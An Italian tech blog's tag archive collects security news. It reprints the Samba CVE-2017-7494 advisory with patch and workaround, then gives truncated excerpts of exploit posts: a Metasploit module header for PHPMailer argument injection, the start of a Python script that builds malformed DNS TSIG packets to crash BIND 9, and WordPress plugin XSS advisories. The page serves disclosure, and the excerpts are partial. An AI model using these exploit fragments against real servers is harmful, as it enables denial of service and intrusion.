Tags archives: unix

 

0

Scovata una vulnerabilità critica in Samba presente da ben 7 anni

Correte ad aggiornare Samba sul vostro PC!

I developer di Samba hanno scovato una vulnerabilità critica (CVE-2017-7494) presente in Samba da ben 7 anni (interessa tutte le versioni più recenti, da Samba 3.5.0 in poi) che consente l'esecuzione di codice in modalità remota e che potrebbe consentire ad un aggressore remoto di prendere il controllo di una macchina Linux o Unix.

CVE-2017-7494.html:

====================================================================
== Subject: Remote code execution from a writable share.
==
== CVE ID#: CVE-2017-7494
==
== Versions: All versions of Samba from 3.5.0 onwards.
==
== Summary: Malicious clients can upload and cause the smbd server
== to execute a shared library from a writable share.
==
====================================================================

===========
Description
===========

All versions of Samba from 3.5.0 onwards are vulnerable to a remote
code execution vulnerability, allowing a malicious client to upload a
shared library to a writable share, and then cause the server to load
and execute it.

==================
Patch Availability
==================

A patch addressing this defect has been posted to

http://www.samba.org/samba/security/

Additionally, Samba 4.6.4, 4.5.10 and 4.4.14 have been issued as
security releases to correct the defect. Patches against older Samba
versions are available at http://samba.org/samba/patches/. Samba
vendors and administrators running affected versions are advised to
upgrade or apply the patch as soon as possible.

==========
Workaround
==========

Add the parameter:

nt pipe support = no

to the [global] section of your smb.conf and restart smbd. This
prevents clients from accessing any named pipe endpoints. Note this
can disable some expected functionality for Windows clients.

=======
Credits
=======

This problem was found by steelo . Volker
Lendecke of SerNet and the Samba Team provided the fix.

Se siete su Ubuntu e derivate la vulnerabilità è stata già corretta con i recenti aggiornamenti e dunque vi basterà soltanto aggiornare il sistema.

 

0

PHPMailer Sendmail Argument Injection

## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ##   require 'msf/core'   class MetasploitModule < Msf::Exploit::Remote Rank = ManualRanking   include Msf::Exploit::FileDropper include Msf::Exploit::Remote::HttpClient   def initialize(info = {}) super(update_info(info, 'Name' => 'PHPMailer Sendmail Argument Injection', 'Description' => %q{ PHPMailer versions up to and including 5.2.19 are affected by a vulnerability [...]

 

 

0

FAST RdesktopGUI, automatizzare connessioni terminal server da Linux

 

0

BIND 9 DNS Server Denial Of Service

import socket import struct   TARGET = ('192.168.200.10', 53)   Q_A = 1 Q_TSIG = 250 DNS_MESSAGE_HEADERLEN = 12     def build_bind_nuke(question="\x06google\x03com\x00", udpsize=512): query_A = "\x8f\x65\x00\x00\x00\x01\x00\x00\x00\x00\x00\x01" + question + int16(Q_A) + "\x00\x01"   sweet_spot = udpsize - DNS_MESSAGE_HEADERLEN + 1 tsig_rr = build_tsig_rr(sweet_spot)   return query_A + tsig_rr   def int16(n): return struct.pack("!H", n) [...]

 

0

WordPress Google Maps 2.1.2 Cross Site Scripting

------------------------------------------------------------------------ Cross-Site Scripting vulnerability in Google Maps WordPress Plugin ------------------------------------------------------------------------ Julien Rentrop, July 2016   ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in the Google Maps WordPress Plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing users' session tokens, or performing arbitrary actions on their behalf. [...]

 

0

WordPress Magic Fields 2 Cross Site Scripting

------------------------------------------------------------------------ Persistent Cross-Site Scripting in Magic Fields 2 WordPress Plugin ------------------------------------------------------------------------ Burak Kelebek, July 2016   ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in the Magic Fields 2 plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their [...]

 

0

WordPress Magic Fields 1 Cross Site Scripting

------------------------------------------------------------------------ Persistent Cross-Site Scripting in Magic Fields 1 WordPress Plugin ------------------------------------------------------------------------ Burak Kelebek, July 2016   ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in the Magic Fields 1 plugin. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their [...]

 

0

WordPress Store Locator Plus 4.5.09 Cross Site Scripting

------------------------------------------------------------------------ Cross-Site Scripting in Store Locator Plus for WordPress ------------------------------------------------------------------------ Yorick Koster, July 2016   ------------------------------------------------------------------------ Abstract ------------------------------------------------------------------------ A Cross-Site Scripting vulnerability was found in Store Locator Plus for WordPress. This issue allows an attacker to perform a wide variety of actions, such as stealing Administrators' session tokens, or performing arbitrary actions on their behalf. [...]

 

0

WordPress Welcome Announcement 1.0.5 Cross Site Scripting

##################### # Exploit Title: Wordpress Welcome Announcement Cross Site Scripting # Exploit Author: bl4ck_mohajem # Vendor Homepage: https://wordpress.org/plugins/welcome-announcement/ # Tested On: Windows7 # Software Link: https://downloads.wordpress.org/plugin/welcome-announcement.1.0.5.zip # Version: 1.0.5 ###################### # Vulnerable File and Codes: wa_options.php Lines(134-142-161-188-196-204-215-223-234-258-266)   <input class="entry" type="text" size=40 name="wa_opts[cookie_name]" value="<?php echo $wa_opts["cookie_name"]; ?>" /> <input class="entry" type="text" size=40 name='wa_opts[cookie_expiration]'value="<?php echo $wa_opts["cookie_expiration"]; [...]